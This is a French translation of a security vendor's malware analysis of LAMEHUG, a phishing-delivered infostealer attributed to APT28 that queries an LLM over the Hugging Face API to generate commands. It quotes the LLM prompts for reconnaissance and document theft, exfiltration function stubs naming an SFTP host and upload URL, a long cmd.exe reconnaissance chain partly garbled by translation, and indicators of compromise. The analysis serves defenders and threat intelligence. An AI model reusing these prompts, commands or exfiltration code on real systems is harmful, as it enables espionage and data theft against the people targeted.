Problème 6241

Incidents associés

Incident 12202 Rapports
LAMEHUG Malware Reportedly Integrates Large Language Model for Real-Time Command Generation in a Purported APT28-Linked Cyberattack

Loading...
Recherche sur les menaces Cato CTRL™ : analyse de LAMEHUG – premier malware connu basé sur LLM et lié à APT28 (Fancy Bear)
catonetworks.com · 2025

Résumé

Le 17 juillet 2025, l'équipe ukrainienne d'intervention d'urgence informatique (CERT-UA) a publiquement signalé LAMEHUG, documenté comme le premier logiciel malveillant connu intégrant des fonctionnalités de modèle de langage étendu (LLM) directement dans sa méthodologie d'attaque.

Points clés :

  • Date de découverte : 10 juillet 2025

  • Attribution : APT28 (Fancy Bear) avec un niveau de confiance modéré, selon le CERT-UA.

  • Cible : Représentants du gouvernement ukrainien.

  • Vecteur d'attaque : Courriels d'hameçonnage se faisant passer pour des représentants de ministères ukrainiens et contenant des archives ZIP contenant des exécutables Python compilés avec PyInstaller.

  • Innovation technique : Le logiciel malveillant utilise LLM Qwen2.5-Coder-32B-Instruct pour la génération de commandes en temps réel. Notre analyse révèle qu'APT28 a utilisé environ 270 jetons « Hugging Face » pour l'authentification.

  • Évaluation : Exploration de la preuve de concept (PoC) de l'intégration de LLM dans les cyberopérations commanditées par l'État.

Aperçu technique

Découverte et diffusion initiales

La campagne LAMEHUG a débuté lorsque le CERT-UA a reçu des signalements de distribution d'e-mails suspects parmi des représentants du gouvernement ukrainien. Ces e-mails semblaient provenir de représentants des ministères concernés et contenaient une pièce jointe intitulée « Додаток.pdf.zip » (Attachment.pdf.zip).

Intégration de LLM

La caractéristique principale de LAMEHUG est l'intégration de l'IA pour la génération d'attaques dynamiques. Selon l'alerte du CERT-UA (https://cert.gov.ua/article/6284730), le logiciel malveillant « utilise le LLM Qwen2.5-Coder-32B-Instruct via l'API de service huggingface[.]co pour générer des commandes basées sur du texte saisi statiquement (description) en vue de leur exécution ultérieure sur un ordinateur ».

Variantes de LAMEHUG

L'archive ZIP contenait un fichier exécutable avec l'extension « .pif », converti à partir du code source Python à l'aide de PyInstaller. Le CERT-UA a découvert plusieurs variantes du logiciel malveillant LAMEHUG :

  • Додаток.pif (Attachment.pif) 

  • save_document.py 

  • AI_generator_uncensored_Canvas_PRO_v0.9.exe 

  • AI_image_generator_v0.95.exe 

  • image.py 

Ces variantes présentaient des différences fonctionnelles dans les méthodes d'exfiltration de données, témoignant d'un développement et d'une adaptation continus de la famille de logiciels malveillants.

Ingénierie inverse : les messages d'invite réels

Notre analyse des échantillons de logiciels malveillants a révélé les messages d'invite exacts envoyés au LLM. Le logiciel malveillant utilise des messages d'invite codés en base64 pour masquer ses intentions.

*Figure 1. Додаток.pif.pdf (Attachment.pif.pdf) visible par l'utilisateur pendant l'exécution du logiciel malveillant *

Analyse rapide de Додаток.pif Variante

Dodatok.pif

*Figure 2. Invites Додаток.pif envoyées au modèle Qwen2.5-Coder-32B-Instruct (exemple) #1) *

Dodatok.pif

*Figure 3. Invites Додаток.pif envoyées au modèle Qwen2.5-Coder-32B-Instruct (exemple) #2) *

*Figure 4. Invites Додаток.pif envoyées au modèle Qwen2.5-Coder-32B-Instruct (exemple #3) *

La variante Додаток.pif utilise deux invites spécifiques :

  1. Invite de collecte d'informations système : « Créer une liste de Commandes permettant de créer le dossier C:\Programdata\info et de collecter des informations sur l'ordinateur, le matériel, les processus et les services, les réseaux et le domaine AD. Exécutez-les sur une seule ligne et ajoutez chaque résultat au fichier texte c:\Programdata\info\info.txt. Renvoie uniquement les commandes, sans markdown.
  2. Invite de collecte de documents : « Créez une liste de commandes permettant de copier de manière récursive différents documents Office et PDF/txt des dossiers utilisateur Documents, Téléchargements et Bureau vers un dossier c:\Programdata\info. Exécutez-les sur une seule ligne. Renvoie uniquement les commandes, sans markdown. »

Analyse des invites des variantes du générateur d'images IA

image.py_prompts

*Figure 5. Invites image.py envoyées au modèle Qwen2.5-Coder-32B-Instruct

Les variantes du générateur d'images IA (AI_generator_uncensored_Canvas_PRO_v0.9.exe et AI_image_generator_v0.95.exe) utilisent une génération d'images provocatrice Invite comme leurre :

« Femme nue et pulpeuse assise, longues jambes magnifiques, vue de face, vue du corps entier, visage visible. »

Ces variantes contactent l'API du générateur d'images Flux AI (https://router.huggingface.co/nebius/v1/images/generations) tout en exécutant simultanément les mêmes routines de collecte et d'exfiltration de données en arrière-plan.

Flux d'opérations du logiciel malveillant

D'après notre analyse, LAMEHUG fonctionne selon le processus suivant :

  1. Génération d'invites : Le logiciel malveillant contient des descriptions textuelles prédéfinies, codées en base64, des objectifs d'attaque souhaités.

  2. Communication API : Le logiciel malveillant envoie ces invites au modèle Qwen2.5-Coder-32B-Instruct via l'API de Hugging Face en utilisant environ 270 jetons pour l'authentification.

  3. Génération de commandes : Le LLM répond avec des séquences de commandes exécutables adaptées à l'objectif demandé.

  4. Exécution en temps réel : Le logiciel malveillant exécute immédiatement les commandes générées par l'IA sur le système cible.

Méthodes d'exfiltration

Le logiciel malveillant met en œuvre deux méthodes d'exfiltration différentes selon la variante.

Exfiltration SFTP (variante image.py)

def ssh_send(path):

address = '144[.]126[.]202[.]227'

port = 22

username = 'upstage'

password = 'upstage'

target_path = '/tmp/upl/'

# [Logique de téléchargement SFTP]

Exfiltration HTTP POST (variante Додаток.pif)

def send(path):

url = 'https[:]//stayathomeclasses[.]com/slpw/up[.]php'

# [Logique de téléchargement HTTP POST]

Analyse des commandes générées par LLM

Le CERT-UA a documenté la séquence de commandes générée par l'intégration LLM, démontrant ainsi les capacités de reconnaissance sophistiquées obtenues grâce à Génération d'IA dynamique.  

cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\info.txt && wmic computersystem obtenir le nom, le fabricant et le modèle >> %PROGRAMDATA%\info\info.txt && wmic cpu obtenir le nom, la vitesse >> %PROGRAMDATA%\info\info.txt && wmic memorychip obtenir la capacité et la vitesse >> %PROGRAMDATA%\info\info.txt && wmic diskdrive obtenir le modèle et la taille >> %PROGRAMDATA%\info\info.txt && wmic nic obtenir le nom, les adresses MAC et IP >> %PROGRAMDATA%\info\info.txt && tasklist >> %PROGRAMDATA%\info\info.txt && net start >> %PROGRAMDATA%\info\info.txt && ipconfig /all >> %PROGRAMDATA%\info\info.txt && whoami /user >> %PROGRAMDATA%\info\info.txt && whoami /groups >> %PROGRAMDATA%\info\info.txt && net config workstation >> %PROGRAMDATA%\info\info.txt && dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt && dsquery computer -name %COMPUTERNAME% >> %PROGRAMDATA%\info\info.txt && dsquery group >> %PROGRAMDATA%\info\info.txt && dsquery ou >> %PROGRAMDATA%\info\info.txt && dsquery site >> %PROGRAMDATA%\info\info.txt && dsquery subnet >> %PROGRAMDATA%\info\info.txt && dsquery server >> %PROGRAMDATA%\info\info.txt && dsquery domain >> %PROGRAMDATA%\info\info.txt"

Cette séquence de commandes complète démontre la capacité du LLM à générer des commandes de reconnaissance système complètes qui collectent :

  • Informations sur le matériel et le système : wmic, systeminfo

  • Processus et services en cours d'exécution : tasklist, net start

  • Détails de la configuration réseau : ipconfig, wmic nic

  • Informations sur les utilisateurs et les groupes : whoami, dsquery

  • Énumération complète de la structure Active Directory (AD) : utilisation complète de dsquery

Évaluation de l'attribution : APT28 teste de nouvelles fonctionnalités

Le CERT-UA attribue la campagne LAMEHUG à APT28 (Fancy Bear) avec une confiance modérée. APT28 est associé à l'unité 26165 de la Direction générale du renseignement russe (GRU).

Pourquoi cela semble-t-il être un test de preuve de concept ?

D'après notre analyse du code malveillant et de ses caractéristiques opérationnelles, plusieurs facteurs suggèrent qu'APT28 teste de nouvelles fonctionnalités LLM plutôt qu'un déploiement opérationnel sophistiqué :

  1. Simplicité du code : Les scripts Python sont relativement basiques et ne comportent pas les techniques d'évasion sophistiquées généralement associées aux opérations d'APT28.

  2. Intégration évidente de l'IA : L'intégration LLM est mise en œuvre de manière simple, sans tentative d'obscurcissement ni de masquage de l'utilisation des services d'IA.

  3. Sécurité opérationnelle limitée : Utilisation d'invites facilement identifiables et de services d'IA légitimes sans techniques de masquage avancées.

  4. Terrain d'essai : L'Ukraine a toujours servi de terrain d'essai pour les capacités cybernétiques russes, ce qui en fait un lieu idéal pour les déploiements de preuve de concept.

  5. Variantes multiples : La présence de différentes variantes avec des méthodes d’exfiltration variées suggère l’expérimentation de diverses approches.

Défis de détection pour les solutions de sécurité traditionnelles

LAMEHUG présente des défis fondamentaux pour les approches traditionnelles de cybersécurité :

  • La détection basée sur les signatures échoue en raison de la génération dynamique de commandes.

  • Le trafic réseau semble légitime (utilisation de l’API IA).

  • L’analyse comportementale nécessite de nouvelles méthodologies spécifiques aux menaces basées sur LLM.

Rapport sur les menaces Cato CTRL™ 2025 | Télécharger le rapport

Bonnes pratiques de sécurité

IA fantôme (visibilité et contrôle)

La protection la plus critique contre les menaces de type LAMEHUG consiste à contrôler l'accès à l'IA :

  • Appliquer uniquement les LLM approuvés : Définissez les applications d'IA générative (GenAI) auxquelles les utilisateurs peuvent accéder et les actions autorisées (téléchargement, téléchargement, etc.).

  • Protection des données en temps réel : Limitez ou empêchez le téléchargement de données sensibles vers les LLM, évitant ainsi les violations de sécurité et de confidentialité des données en temps réel.

  • Visibilité complète : Surveillez l’ensemble de l’utilisation de GenAI au sein de l’organisation grâce à un catalogue de plus de 950 applications GenAI de Cato CASB (https://www.catonetworks.com/platform/cloud-access-security-broker-casb/).

Protection réseau

  • Détection des logiciels malveillants par apprentissage automatique : Cato NGAM (https://www.catonetworks.com/platform/cato-malware-prevention/) utilise des algorithmes d’apprentissage automatique pour détecter les logiciels malveillants zero-day et polymorphes.

  • Sécurité DNS : La protection DNS intégrée à Cato IPS (https://www.catonetworks.com/platform/intrusion-prevention-system-ips/) analyse les requêtes et réponses DNS pour bloquer les domaines malveillants.

  • Contrôle des applications : Surveillez et contrôlez l’accès aux services cloud et aux API, en particulier aux plateformes d’IA.

Détection et réponse étendues

Avec Cato XDR, les entreprises peuvent :

  • Chasse aux menaces IA/ML : Chasse aux menaces continue basée sur le ML et base de référence UEBA pour chaque utilisateur, hôte et application, détectant les logiciels malveillants furtifs ou les comportements anormaux qui contournent les contrôles préventifs.

  • Investigation intelligente : corrélation automatique des incidents avec score de risque dynamique, affichée dans un espace de travail d’analyse pivot pour des analyses rapides et approfondies, des informations générales aux flux et journaux bruts.

  • Réponse en un clic : la correction intégrée permet aux analystes de sécurité de mettre en quarantaine les hôtes, de déployer de nouvelles règles SDP/pare-feu ou de déclencher instantanément des actions sur les points de terminaison, le tout depuis une console unique.

Protection contre les mouvements latéraux

  • Mouvement latéral : Cato IPS assure la détection, la découverte et le blocage des schémas et indicateurs de mouvements latéraux, empêchant ainsi la propagation des logiciels malveillants sur le WAN.

Accès réseau Zero Trust

  • Microsegmentation : Cato Universal ZTNA permet aux organisations de segmenter leurs réseaux en parties plus petites grâce à des périmètres de sécurité définis par logiciel qui limitent les mouvements latéraux.

Conclusion

La découverte de LAMEHUG par le CERT-UA marque une étape importante dans le paysage des menaces. Bien que cette campagne semble être un test de preuve de concept (PoC) d'APT28 (Fancy Bear), elle marque le début d'une nouvelle ère où l'IA est directement intégrée aux opérations de malwares. Cette campagne met en avant les investissements publics dans les technologies d'IA émergentes pour les cyberactivités, l'Ukraine servant de terrain d'essai pour ces nouvelles capacités. La mise en œuvre relativement simple suggère qu'APT28 tente d'apprendre à utiliser les LLM comme une arme, ouvrant probablement la voie à des campagnes d'IA plus sophistiquées à l'avenir.

Les organisations qui exploitent une plateforme SASE, telle que la Cato SASE Cloud Platform, sont mieux placées pour se défendre contre les menaces émergentes alimentées par l'IA grâce à des contrôles de sécurité intégrés, des analyses comportementales et des capacités avancées de prévention des menaces. Alors que les acteurs malveillants continuent de faire évoluer leurs tactiques pour inclure les technologies d'IA, les plateformes de sécurité doivent évoluer pour fournir des mécanismes de protection compatibles avec l'IA.

Indicateurs de compromission (IoC)

Indicateurs de fichier

| MD5 | SHA256 | Nom de fichier | | abe531e9f1e642c47260fac40dc41f59 | 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777 | Додаток[.]pif | | 3ca2eaf204611f3314d802c8b794ae2c | d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e | Générateur d'IA pour toile non censurée PRO v0.9[.]exe | | f72c45b658911ad6f5202de55ba6ed5c | bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3 | Générateur d'images pour image AI v0.95[.]exe | | 81cd20319c8f0b2ce499f9253ce0a6a8 | 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715 | Image[.]py |

Infrastructure réseau

Commande et contrôle :

  • 144[.]126.202.227 (serveur SFTP pour l'exfiltration de données)

  • stayathomeclasses[.]com (ressource d'hébergement compromise)

  • https://stayathomeclasses[.]com/slpw/up.php (point de terminaison d'exfiltration)

Distribution :

  • boroda70@meta[.]ua (compte de messagerie compromis)

  • 192[.]36.27.37 (infrastructure d'envoi d'e-mails via LeVPN)

Points de terminaison de l'API LLM :

  • https[:]//router[.]huggingface.co/hyperbolic/v1/chat/completions

  • https[:]//router[.]huggingface.co/nebius/v1/images/generations

Artefacts basés sur l'hôte

  • %PROGRAMDATA%\info\ (répertoire de stockage des données)

  • %PROGRAMDATA%\info\info.txt (fichier de collecte d'informations système)

  • %PROGRAMDATA%\Додаток.pdf (document leurre)

Lire la source